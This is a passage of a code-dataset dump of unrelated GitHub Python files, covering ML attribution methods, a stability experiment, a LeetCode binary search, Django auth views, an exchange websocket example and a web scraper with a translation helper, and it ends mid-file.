class_names\n","repo_name":"RumiaGIT/pytorch-research","sub_path":"modular_scripts/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36816241545","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom dang.experiment_evaluate import *\nfrom dang.experiment_tab import run_dang, run_norm, run_rand, run_supp, run_cgan\n\nfrom scipy.spatial.distance import pdist\n\n\n\ndef main():\n\n dataset = 'parkinsons'\n\n for dataset in ['wdbc', 'diabetes', 'ctg', 'ionoshpere', 'parkinsons', 'sonar', 'vehicle', 'avila']:\n # for dataset in ['gunpoint', 'italypower', 'arrowhead', 'ecg200', 'phalanges', 'electricdevices']:\n\n method_name = 'norm'\n\n test_size = 100\n train_size = 10\n n_samples = 1000\n nbr_experiments = 100\n\n print(datetime.datetime.now(), 'Dataset: %s' % dataset, method_name)\n D = get_dataset(dataset, path_dataset, normalize=None)\n\n X_train, y_train, X_test, y_test = D['X_train'], D['y_train'], D['X_test'], D['y_test']\n n_classes = D['n_classes']\n\n if len(X_test) > test_size:\n idx = np.random.choice(len(X_test), size=test_size, replace=False)\n X_T = X_test[idx]\n else:\n X_T = X_test\n\n diff_means = list()\n for x in X_T:\n Z_stats, run_time_list = list(), list()\n for i in range(nbr_experiments):\n print(datetime.datetime.now(), '\\tSize: %s' % train_size, method_name)\n\n if len(X_train) > train_size:\n idx = np.random.choice(len(X_train), size=train_size, replace=False)\n X_S = X_train[idx]\n else:\n X_S = X_train\n\n if method_name == 'dang':\n Z, run_train = run_dang(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'rand':\n Z, run_train = run_rand(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'supp':\n Z, run_train = run_supp(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'norm':\n Z, run_train = run_norm(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'cgan':\n Z, run_train = run_cgan(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n else:\n raise ValueError('Unknown method %s' % method_name)\n\n Z_stats.append(np.mean(Z, axis=0))\n\n val = pdist(np.array(Z_stats))\n diff_means.append(np.mean(val))\n\n eval_stability = {\n 'stability_mean': float(np.mean(diff_means)),\n 'stability_std': float(np.std(diff_means)),\n 'stability_sum': float(np.sum(diff_means)),\n 'stability_median': float(np.median(diff_means)),\n 'stability_min': float(np.min(diff_means)),\n 'stability_max': float(np.max(diff_means)),\n }\n\n eval_stability['dataset'] = dataset\n eval_stability['method'] = method_name\n eval_stability['n_samples'] = n_samples\n eval_stability['train_size'] = train_size\n eval_stability['test_size'] = test_size\n\n print(datetime.datetime.now(), 'Storing evaluation')\n store_result(eval_stability, 'tabular_neigh_stability')\n # store_result(eval_stability, 'ts_neigh_stability')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"riccotti/DAG","sub_path":"code/experiment_stability.py","file_name":"experiment_stability.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17598733684","text":"import numpy as np\nimport pandas as pd\nimport logomaker\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ntf.compat.v1.disable_eager_execution()\nfrom tensorflow import keras\nfrom 
tensorflow.keras import backend as K\nimport tensorflow.compat.v1.keras.backend as K1\nimport shap\n\n\n\ndef saliency(model, X, class_index=0, layer=-2, batch_size=256):\n saliency = K1.gradients(model.layers[layer].output[:,class_index], model.input)[0]\n sess = K1.get_session()\n\n N = len(X)\n num_batches = int(np.floor(N/batch_size))\n\n attr_score = []\n for i in range(num_batches):\n attr_score.append(sess.run(saliency, {model.inputs[0]: X[i*batch_size:(i+1)*batch_size]}))\n if num_batches*batch_size < N:\n attr_score.append(sess.run(saliency, {model.inputs[0]: X[num_batches*batch_size:N]}))\n\n return np.concatenate(attr_score, axis=0)\n\n\ndef mutagenesis(model, X, class_index=0, layer=-2):\n\n def generate_mutagenesis(X):\n L,A = X.shape \n\n X_mut = []\n for l in range(L):\n for a in range(A):\n X_new = np.copy(X)\n X_new[l,:] = 0\n X_new[l,a] = 1\n X_mut.append(X_new)\n return np.array(X_mut)\n\n N, L, A = X.shape \n intermediate = keras.Model(inputs=model.inputs, outputs=model.layers[layer].output)\n\n attr_score = []\n for x in X:\n\n # get baseline wildtype score\n wt_score = intermediate.predict(np.expand_dims(x, axis=0))[:, class_index]\n\n # generate mutagenized sequences\n x_mut = generate_mutagenesis(x)\n \n # get predictions of mutagenized sequences\n predictions = intermediate.predict(x_mut)[:,class_index]\n\n # reshape mutagenesis predictiosn\n mut_score = np.zeros((L,A))\n k = 0\n for l in range(L):\n for a in range(A):\n mut_score[l,a] = predictions[k]\n k += 1\n \n attr_score.append(mut_score - wt_score)\n return np.array(attr_score)\n\n\ndef deepshap(model, X, class_index=0, layer=-2, num_background=10, reference='shuffle'):\n\n N, L, A = X.shape \n if reference is not 'shuffle':\n num_background = 1\n \n # set of background sequences to take expectation over\n shap_values = []\n for j, x in enumerate(X):\n if np.mod(j, 50) == 0:\n print(\"%d out of %d\"%(j,N))\n if reference == 'shuffle':\n background = []\n for i in range(num_background):\n shuffle = np.random.permutation(L)\n background.append(x[shuffle, :])\n background = np.array(background)\n else: \n background = np.zeros([1,L,A]) \n\n x = np.expand_dims(x, axis=0)\n # calculate SHAPLEY values \n background.shape\n e = shap.DeepExplainer(model, background)\n shap_values.append(e.shap_values(x)[0])\n\n attr_score = np.concatenate(shap_values, axis=0)\n return attr_score\n\n\n \n\ndef integrated_grad(model, X, class_index=0, layer=-2, num_background=10, num_steps=20, reference='shuffle'):\n\n def linear_path_sequences(x, num_background, num_steps, reference):\n def linear_interpolate(x, base, num_steps=20):\n x_interp = np.zeros(tuple([num_steps] +[i for i in x.shape]))\n for s in range(num_steps):\n x_interp[s] = base + (x - base)*(s*1.0/num_steps)\n return x_interp\n\n L, A = x.shape \n seq = []\n for i in range(num_background):\n if reference == 'shuffle':\n shuffle = np.random.permutation(L)\n background = x[shuffle, :]\n else: \n background = np.zeros(x.shape) \n seq.append(linear_interpolate(x, background, num_steps))\n return np.concatenate(seq, axis=0)\n\n # setup op to get gradients from class-specific outputs to inputs\n saliency = K1.gradients(model.layers[layer].output[:,class_index], model.input)[0]\n\n # start session\n sess = K1.get_session()\n\n attr_score = []\n for x in X:\n # generate num_background reference sequences that follow linear path towards x in num_steps\n seq = linear_path_sequences(x, num_background, num_steps, reference)\n \n # average/\"integrate\" the saliencies along path 
-- average across different references\n attr_score.append([np.mean(sess.run(saliency, {model.inputs[0]: seq}), axis=0)])\n attr_score = np.concatenate(attr_score, axis=0)\n\n return attr_score\n\n\n \ndef attribution_score(model, X, method='saliency', norm='times_input', class_index=0, layer=-2, **kwargs):\n\n N, L, A = X.shape \n if method == 'saliency':\n if 'batch_size' in kwargs:\n batch_size = kwargs['batch_size']\n else:\n batch_size=256\n \n attr_score = saliency(model, X, class_index, layer, batch_size)\n\n \n elif method == 'mutagenesis':\n \n attr_score = mutagenesis(model, X, class_index, layer)\n \n elif method == 'deepshap':\n if 'num_background' in kwargs:\n num_background = kwargs['num_background']\n else:\n num_background = 5\n if 'reference' in kwargs:\n reference = kwargs['reference']\n else:\n reference = 'shuffle'\n \n attr_score = deepshap(model, X, class_index, num_background, reference)\n\n \n elif method == 'integrated_grad':\n if 'num_background' in kwargs:\n num_background = kwargs['num_background']\n else:\n num_background = 10\n if 'num_steps' in kwargs:\n num_steps = kwargs['num_steps']\n else:\n num_steps = 20\n if 'reference' in kwargs:\n reference = kwargs['reference']\n else:\n reference = 'shuffle'\n \n attr_score = integrated_grad(model, X, class_index, layer, num_background, num_steps, reference)\n\n if norm == 'l2norm':\n attr_score = np.sqrt(np.sum(np.squeeze(attr_score)**2, axis=2, keepdims=True) + 1e-10)\n attr_score = X * np.matmul(attr_score, np.ones((1, X.shape[-1])))\n \n elif norm == 'times_input':\n attr_score *= X\n\n return attr_score\n\n\n#-------------------------------------------------------------------------------------------------\n# Plot conv filters\n#-------------------------------------------------------------------------------------------------\n\n\ndef plot_filers(model, x_test, layer=3, threshold=0.5, window=20, num_cols=8, figsize=(30,5)):\n\n intermediate = keras.Model(inputs=model.inputs, outputs=model.layers[layer].output)\n fmap = intermediate.predict(x_test)\n W = activation_pwm(fmap, x_test, threshold=threshold, window=window)\n\n num_filters = len(W)\n num_widths = int(np.ceil(num_filters/num_cols))\n\n fig = plt.figure(figsize=figsize)\n fig.subplots_adjust(hspace=0.1, wspace=0.1)\n\n logos = []\n for n, w in enumerate(W):\n ax = fig.add_subplot(num_widths, num_cols, n+1)\n \n # calculate sequence logo heights\n I = np.log2(4) + np.sum(w * np.log2(w+1e-10), axis=1, keepdims=True)\n logo = np.maximum(I*w, 1e-7)\n\n L, A = w.shape\n counts_df = pd.DataFrame(data=0.0, columns=list('ACGT'), index=list(range(L)))\n for a in range(A):\n for l in range(L):\n counts_df.iloc[l,a] = logo[l,a]\n\n logomaker.Logo(counts_df, ax=ax)\n ax = plt.gca()\n ax.set_ylim(0,2)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('none')\n ax.xaxis.set_ticks_position('none')\n plt.xticks([])\n plt.yticks([])\n \n logos.append(logo)\n \n return fig, W, logo\n\n\n\ndef activation_pwm(fmap, X, threshold=0.5, window=20):\n\n # extract sequences with aligned activation\n window_left = int(window/2)\n window_right = window - window_left\n\n N,L,A = X.shape\n num_filters = fmap.shape[-1]\n\n W = []\n for filter_index in range(num_filters):\n\n # find regions above threshold\n coords = np.where(fmap[:,:,filter_index] > np.max(fmap[:,:,filter_index])*threshold)\n\n if len(coords) > 1:\n x, y = coords\n\n # sort score\n index = np.argsort(fmap[x,y,filter_index])[::-1]\n data_index = 
x[index].astype(int)\n pos_index = y[index].astype(int)\n\n # make a sequence alignment centered about each activation (above threshold)\n seq_align = []\n for i in range(len(pos_index)):\n\n # determine position of window about each filter activation\n start_window = pos_index[i] - window_left\n end_window = pos_index[i] + window_right\n\n # check to make sure positions are valid\n if (start_window > 0) & (end_window < L):\n seq = X[data_index[i], start_window:end_window, :]\n seq_align.append(seq)\n\n # calculate position probability matrix\n if len(seq_align) > 1:#try:\n W.append(np.mean(seq_align, axis=0))\n else: \n W.append(np.ones((window,4))/4)\n else:\n W.append(np.ones((window,4))/4)\n\n return np.array(W)\n\n","repo_name":"p-koo/exponential_activations","sub_path":"code/tfomics/explain.py","file_name":"explain.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2920735230","text":"\"\"\"Binary Search\n\nURL: https://leetcode.com/problems/binary-search/\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n @staticmethod\n def search(numbers: List[int], target: int) -> int:\n result = -1\n\n length = len(numbers)\n minimum = 0\n maximum = length\n split_size = None\n\n while split_size is None or split_size > 0:\n split_size = (maximum - minimum) // 2\n position = minimum + split_size\n number = numbers[position]\n\n if target > number:\n minimum += split_size\n elif target < number:\n maximum -= split_size\n else:\n result = position\n break\n\n return result\n\n\ndef test_case_1():\n nums = [-1, 0, 3, 5, 9, 12]\n target = 9\n assert Solution.search(nums, target) == 4\n\n\ndef test_case_2():\n nums = [-1, 0, 3, 5, 9, 12]\n target = 2\n assert Solution.search(nums, target) == -1\n\n\ndef test_case_3():\n nums = [5]\n target = 5\n assert Solution.search(nums, target) == 0\n\n\ndef test_case_4():\n nums = [2, 5]\n target = 5\n assert Solution.search(nums, target) == 1\n","repo_name":"LevZaplatin/problem-solving","sub_path":"leetcode/704-binary-search/test_704_binary_search.py","file_name":"test_704_binary_search.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12498967036","text":"from settings import *\nfrom Voie import *\n\nclass Route(object):\n def __init__(self, axe, coord):\n self.axe = axe # 'x' ou 'y'\n self.coord = coord # Coordonnee de la route sur l'axe perpendiculaire a axe\n self.voies = [Voie(self, coord - m2p(largeurVoie)//2, 0), Voie(self, coord + m2p(largeurVoie)//2, 1)]\n \n def afficher(self):\n for voie in self.voies:\n voie.afficher()\n \n if dessinerLignesContinues:\n stroke(255)\n fill(255)\n if self.axe == 'x':\n rect(width//2, self.coord, width, m2p(largeurLigneContinue)//1)\n else:\n rect(self.coord, height//2, m2p(largeurLigneContinue)//1, height)\n noStroke()\n","repo_name":"FlorianGianni/TIPE","sub_path":"Route.py","file_name":"Route.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4824268004","text":"import queue\n\nq=queue.PriorityQueue()\n#put进入一个元组,元组的第一个元素是优先级(通常是数字,也可以是非数字之间的比较),数字越小优先级越高\nq.put((20,'a'))\nq.put((10,'b'))\nq.put((30,'c'))\n\nprint(q.get())\nprint(q.get())\nprint(q.get())\n'''\n结果(数字越小优先级越高,优先级高的优先出队):\n(10, 'b')\n(20, 'a')\n(30, 
'c')\n'''","repo_name":"huotong1212/mylearnpy","sub_path":"code/day11/进程与线程/线程/线程通信/队列/Priority优先级别队列.py","file_name":"Priority优先级别队列.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12601698052","text":"import time\nfrom config import TEST_ACCT_KEY, TEST_NETWORK\nfrom firefly_exchange_client import FireflyClient, Networks, MARKET_SYMBOLS, SOCKET_EVENTS, config_logging\nimport asyncio\nimport logging\n\nconfig_logging(logging, logging.DEBUG)\n\nevent_received = False\n\ndef callback(event):\n global event_received\n print(\"Event data:\", event)\n event_received = True\n\nasync def main():\n client = FireflyClient(True, Networks[TEST_NETWORK], TEST_ACCT_KEY)\n await client.init(True)\n \n def on_error(ws, error):\n print(error)\n \n def on_close(ws):\n # unsubscribe from global events\n status = client.webSocketClient.unsubscribe_global_updates_by_symbol(MARKET_SYMBOLS.ETH)\n print(\"Unsubscribed from global ETH events: {}\".format(status))\n # close socket connection\n print(\"### closed ###\")\n \n def on_open(ws):\n # subscribe to global event updates for ETH market \n status = client.webSocketClient.subscribe_global_updates_by_symbol(MARKET_SYMBOLS.ETH)\n print(\"Subscribed to global ETH events: {}\".format(status))\n\n # SOCKET_EVENTS contains all events that can be listened to\n print(\"Listening to Exchange Health updates\")\n client.webSocketClient.listen(SOCKET_EVENTS.EXCHANGE_HEALTH.value, callback)\n\n \n # logs event name and data for all markets and users that are subscribed.\n # helpful for debugging\n # client.socket.listen(\"default\",callback)\n \n \n print(\"Making socket connection to firefly exchange\")\n client.webSocketClient.initialize_socket(on_open=on_open, on_error=on_error,on_close=on_close)\n \n timeout = 30\n end_time = time.time() + timeout\n while not event_received and time.time() < end_time:\n time.sleep(1)\n\n client.webSocketClient.stop()\n await client.close_connections()\n\nif __name__ == \"__main__\":\n loop = asyncio.new_event_loop()\n loop.run_until_complete(main())\n loop.close()","repo_name":"fireflyprotocol/firefly-client-python","sub_path":"examples/14.web_sockets.py","file_name":"14.web_sockets.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32631970755","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nDefault input file for combined_workflow\n\nProgram by Charlie Murphy\n'''\n\n# File Names\nmy_electiondatafile = r'C:\\Users\\charl\\Box\\Internships\\Gerry Chain\\States\\Texas\\Combined Level 1\\TX_2020_censusvtds.shp'\nex_dist_name = 'TX_start.csv'\n\n# State Attributes\nstate = 'TX'\npopkey = 'POP19'\ngeotag = 'GEOID20'\nmy_apportionment = 'assignment'\n\n# Chain Attributes\nmarkovchainlength = 1000\npoptol = 0.06\nelectionvol = 0.06\nmax_pop_deviation = 0.0075\n\n# This is the percentage change in the fractional seat share that will be\n# allowed at each step of the Markov Chain. 
Decreasing this value will decrease\n# the change in partisan outcomes, but will also make the program run slower and\n# possibly reduce the amount of smoothing allowed.\nwin_margin = 0.1\n\n# Smoothing\ncutoff = 100\nmargin = 0.001\n\n# Pool Attributes\npoolsize = 6\ntime_interval = 20","repo_name":"Seesam24601/GerryChain-Population-Balance","sub_path":"combined_input.py","file_name":"combined_input.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996977012","text":"\"\"\"\nPlatform Users: user-role-save\n\"\"\"\nfrom typing import Optional, Union\n\nfrom bson.objectid import ObjectId # type: ignore\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PostprocessHook\nfrom hopeit.app.logger import app_extra_logger\n\nfrom app0.admin.db import db\nfrom app0.admin.http import HttpRespInfo\nfrom app0.admin.services import (ACT_USERROLE_DELETE, IDX_USER_ROLE, ROLE_ADMIN)\nfrom app0.admin.services.user_services import save_user_role\nfrom app0.admin.user import UserAppRole\n\nlogger, extra = app_extra_logger()\n\n__steps__ = ['run']\n__api__ = event_api(\n query_args=[\n ('action', Optional[str], \"Apply some action\")\n ],\n payload=(UserAppRole, \"UserRole\"),\n responses={\n 200: (UserAppRole, \"UserRole updated\"),\n 400: (str, \"Request error\"),\n 403: (str, \"Operation forbidden\"),\n 404: (str, \"Object not found\")\n }\n)\n\n\nasync def run(payload: UserAppRole, context: EventContext,\n action: Optional[str] = None) -> Union[UserAppRole, HttpRespInfo]:\n \"\"\"User save & actions\"\"\"\n es = db(context.env)\n # check user admin\n roles = context.auth_info['payload'].get('roles', 'noauth')\n if ROLE_ADMIN not in roles:\n return HttpRespInfo(403, 'User is not Administrator')\n\n if not action:\n await save_user_role(es, payload)\n elif action == ACT_USERROLE_DELETE:\n await _user_role_delete(es, payload, context)\n else:\n return HttpRespInfo(400, 'Action not recognized')\n return payload\n\n\nasync def __postprocess__(payload: Union[UserAppRole, HttpRespInfo], context: EventContext,\n response: PostprocessHook) -> Union[UserAppRole, str]:\n if isinstance(payload, HttpRespInfo):\n response.status = payload.code\n return payload.msg\n return payload\n\n\nasync def _user_role_delete(es, userrole: UserAppRole, context: EventContext):\n # check if user has employee_id & delete\n logger.info(context, f\"Deleting userrole {userrole}\")\n await es[IDX_USER_ROLE].delete_one({'_id': ObjectId(userrole.id)})\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/user_role_save.py","file_name":"user_role_save.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27494729897","text":"from django.shortcuts import render, redirect\nfrom .forms import LoginForm, CustomUserCreationForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import login, logout\nfrom django.http import JsonResponse\nfrom django.conf import settings\nfrom .music_user_token import get_music_user_token\nimport logging\nlogger = logging.getLogger(__name__)\n\nmain_page_url = 'http://justjam.jppj.jp'\nif settings.DEBUG:\n main_page_url = 'http://localhost:8080/html?env=development'\n\n\ndef user_status(request):\n dict_data = {}\n if request.user.is_authenticated:\n dict_data['authenticated'] = True\n 
dict_data['username'] = request.user.username\n else:\n dict_data['authenticated'] = False\n dict_data['username'] = 'AnonymousUser'\n logger.info(dict_data)\n return JsonResponse(dict_data, safe=False)\n\n\ndef music_user_token(request):\n dict_data = get_music_user_token()\n return JsonResponse(dict_data, safe=False)\n\n\ndef login_view(request):\n if request.method == 'POST':\n form = LoginForm(request, data=request.POST)\n\n if form.is_valid():\n logger.info('Form input was valid')\n user = form.get_user()\n\n if user:\n login(request, user)\n return redirect(to=main_page_url)\n else:\n logger.error('error happened')\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url\n }\n return render(request, 'registration/login.html', context)\n else:\n logger.info('Form input was not valid')\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url,\n 'error_message': 'Your input was not valid. Please try again.'\n }\n return render(request, 'registration/login.html', context)\n\n else:\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url\n }\n return render(request, 'registration/login.html', context)\n\n\ndef logout_view(request):\n logout(request)\n return redirect(to=main_page_url)\n\n\ndef signup_view(request):\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(to=main_page_url)\n else:\n context = {\n 'form': CustomUserCreationForm(),\n 'error_message': 'Some Error Happened',\n 'main_page': main_page_url\n }\n return render(request, 'registration/signup.html', context)\n\n else:\n context = {'form': CustomUserCreationForm()}\n return render(request, 'registration/signup.html', context)","repo_name":"kttyo/justjam","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32500139322","text":"\"\"\"Filtering.\"\"\"\n\ndef remove_vowels(string: str) -> str:\n \"\"\"\n Remove vowels (a, e, i, o, u).\n\n :param string: Input string\n :return string without vowels.\n \"\"\"\n a = string\n vowels = ('a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U')\n for x in string:\n if x in vowels:\n a = a.replace(x, \"\")\n return a\n\n\ndef longest_filtered_word(string_list: list) -> str:\n \"\"\"\n Filter, find and return the longest string.\n\n :param string_list: List of strings.\n :return: Longest string without vowels.\n \"\"\"\n i = 0\n while i < len(string_list):\n string_list[i] = remove_vowels(string_list[i])\n i += 1\n string_list.sort(key=len, reverse=True)\n return string_list[0]\n\n\ndef sort_list(string_list: list) -> list:\n \"\"\"\n Filter vowels in strings and sort the list by the length.\n\n Longer strings come first.\n\n :param string_list: List of strings that need to be sorted.\n :return: Filtered list of strings sorted by the number of symbols in descending order.\n \"\"\"\n i = 0\n while i < len(string_list):\n string_list[i] = remove_vowels(string_list[i])\n i += 1\n string_list.sort(key=len, reverse=True)\n return string_list","repo_name":"adaresa/BACKEND","sub_path":"Python/TalTech excercises/04/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10429932105","text":"# This is to take the result of running blat of a proposed set of baits against the AMR database.\n# The goal is to calculate 
which baits are associated with what family so that we can print\n# out AMR family and how many baits will recognize that family. We may decide to enrich some baits\n# in order to deal with the some gene families that we know occur more often in our database.\n\nimport sys\nimport readers\nimport collections\n\nimport ontology_common\n\n\ndef read_fsl(filename):\n groups = readers.read_grouping('grouping.csv', short=True, map_name=True, strip_colon=False)\n bait_to_match = {}\n with open(filename) as f:\n lines = f.readlines()\n skipped_matches = 0\n for line in lines[5:]:\n tokens = line.strip('\\n').split('\\t')\n score = int(tokens[0])\n gene = tokens[9]\n bait = tokens[13]\n if bait in bait_to_match:\n if score > bait_to_match[bait][0]:\n bait_to_match[bait] = (score, gene)\n else:\n bait_to_match[bait] = (score, gene)\n total = collections.defaultdict(int)\n for s, g in bait_to_match.values():\n if g in groups:\n total[groups[g]] += 1\n else:\n total['unknown'] += 1\n return total\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: bait_topmatch.py file.fsl\")\n sys.exit(-1)\n fsl_file = sys.argv[1]\n total = read_fsl(fsl_file)\n terms = ontology_common.parse_obo('new_combined.obo')\n baits_for_class = collections.defaultdict(int)\n for gene in total.keys():\n for cl in ontology_common.get_class(gene, terms):\n baits_for_class[cl] += total[gene]\n\n total_baits = 0\n for k, v in baits_for_class.items():\n if 'resistance gene' in terms[k]['name'][0]:\n print(terms[k]['name'][0], v)\n total_baits += v\n print(\"Total counts for gene class \", total_baits)\n print()\n total_baits = 0\n for k, v in baits_for_class.items():\n if 'resistance gene' not in terms[k]['name'][0]:\n print(terms[k]['name'][0], v)\n total_baits += v\n print(\"Total counts for mechanism \", total_baits)\n\nif __name__ == '__main__':\n main()\n","repo_name":"raymondr/amr-pipeline-tools","sub_path":"bait_topmatch.py","file_name":"bait_topmatch.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3114901954","text":"'''\nCreated on Sep. 
7, 2020\n\n@author: zollen\n'''\n\nimport os\nimport re\nimport pprint\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport titanic_kaggle.lib.titanic_lib as tb\nimport seaborn as sb\nfrom matplotlib import pyplot as plt\n\n\npd.set_option('max_columns', None)\npd.set_option('max_rows', None)\npd.set_option('display.width', 1000)\nnp.random.seed(0)\nsb.set_style('whitegrid')\npp = pprint.PrettyPrinter(indent=3) \n\n\nPROJECT_DIR=str(Path(__file__).parent.parent) \ntrain_df = pd.read_csv(os.path.join(PROJECT_DIR, 'data/train.csv'))\ntest_df = pd.read_csv(os.path.join(PROJECT_DIR, 'data/test.csv'))\n\ntrain_df.loc[train_df['Cabin'] == 'T', 'Cabin'] = 'A'\ntrain_df.loc[train_df['Embarked'].isna() == True, 'Embarked'] = 'S'\ntrain_df.loc[train_df['Fare'].isna() == True, 'Fare'] = 7.25\ntest_df.loc[test_df['Cabin'] == 'T', 'Cabin'] = 'A'\ntest_df.loc[test_df['Embarked'].isna() == True, 'Embarked'] = 'S'\ntest_df.loc[test_df['Fare'].isna() == True, 'Fare'] = 7.25\n\n\nlives, deads = tb.calculateFamilyMembers(train_df)\n\ntb.reenigneeringFamilyMembers(train_df, lives, deads)\ntb.reenigneeringFamilyMembers(test_df, lives, deads)\n\ntrain_df['Ticket'] = train_df['Ticket'].apply(tb.captureTicketId)\ntest_df['Ticket'] = test_df['Ticket'].apply(tb.captureTicketId)\n\ntrain_df['Ticket'] = np.log(train_df['Ticket'])\ntest_df['Ticket'] = np.log(test_df['Ticket'])\n\n\nprint(train_df.describe())\n\n \ndf = train_df[['Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Pclass']]\ndf['Sex'] = df['Sex'].map({'male': 0, 'female': 1})\ncorr = df.corr() \nmask = np.triu(np.ones_like(corr, dtype=np.bool)) \nplt.figure(figsize=(14, 10)) \nsb.heatmap(corr, mask=mask, cmap='RdBu_r', annot=True, linewidths=0.5, fmt='0.2f')\nplt.show()\n \n","repo_name":"zollen/Python-ML","sub_path":"titanic_kaggle/third/titanic_analysis.py","file_name":"titanic_analysis.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44052529848","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport urllib\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport random\nimport json\nimport _thread\nimport threading\nimport os\nimport MySQLdb\nimport time\nimport ast\nimport socket\nimport re\n\n\n# 获得数据库连接--------------------------------------------------------------------------------------------------------\ndef getcon():\n # 打开数据库连接\n db = MySQLdb.connect(\"127.0.0.1\", \"root\", \"123456\", \"javatpoint\", charset='utf8')\n return db\n\n\n# 关闭数据库连接\ndef closecon(db):\n db.close()\n\n\n# 数据查询操作\ndef baseselect(sql):\n db = getcon()\n cursor = db.cursor()\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n print('\\033[1;32m' + '+++++sql查询成功!+++++' + '\\033[0m')\n return results\n except Exception as e:\n print(e)\n print('\\033[1;32m' + \"Error: unable to fecth data\" + '\\033[0m')\n\n closecon(db)\n\n\ndef baseoperation(sql):\n db = getcon()\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n print('\\033[1;32m' + '+++++sql执行成功!+++++' + '\\033[0m')\n except Exception as e:\n print(e)\n print('\\033[1;31m' + '-----sql执行失败!-----' + '\\033[0m')\n db.rollback()\n closecon(db)\n\n\n# 避免数据重复记录\ndef sql_repeat(title):\n selectsql = 'SELECT title FROM t_javatpoint_test'\n results = baseselect(selectsql)\n for row in results:\n if title in row:\n return False\n return True\n\n\n# 
Single tag with no content------------------------------------------------------------------------------------------------------\ndef tag(string, name):\n    string = string.replace('<' + name + '/>', '')\n    return string\n\n\n# Paired tags with no content\ndef tags(string, name):\n    string = string.replace('</' + name + '>', '')\n    start = 0\n    end = 0\n    while string.find('<' + name, end) != -1:\n        string = string[:string.find('<' + name, end)] + string[string.find('>', start) + 1:]\n        start = string.find('<' + name)\n        end = string.find('>')\n    # print(string)\n    return string\n\n\n# Single tag with content\ndef content_tag(string, name):\n    pass\n\n\n# Paired tags with content\ndef content_tags(string, name):\n    pass\n\n\n# Strip tag attributes while keeping the tag itself\ndef remove_attribute(string, name):\n    new_string = string\n    start = 0\n    end = 0\n    while string.find('<' + name) != -1:\n        string = string[:string.find('<' + name, end)] + string[string.find('>', start):]\n        start = string.find('<' + name)\n        end = string.find('>')\n        new_string = '<' + name + string\n    return new_string\n\n\n# Baidu translation module----------------------------------------------------------------------------------------------------------\ndef translate(word, count):\n    url = \"https://fanyi.baidu.com/transapi?from=auto&to=zh&query=\" + word\n    # print('Translating sentence: ' + word)\n    if count <= 5:\n        socket.setdefaulttimeout(5)  # set the global timeout\n        try:\n            # proxy_support = urllib.request.ProxyHandler(getproxyip('proxy_ip_fanyi.txt'))\n            # opener = urllib.request.build_opener(proxy_support)\n            # opener.addheaders = [getheaders()]\n            # urllib.request.install_opener(opener)\n            # res = urllib.request.urlopen(url).read()\n            headers = {\n                'User-Agent': \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) \"\n                              \"Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7\",\n                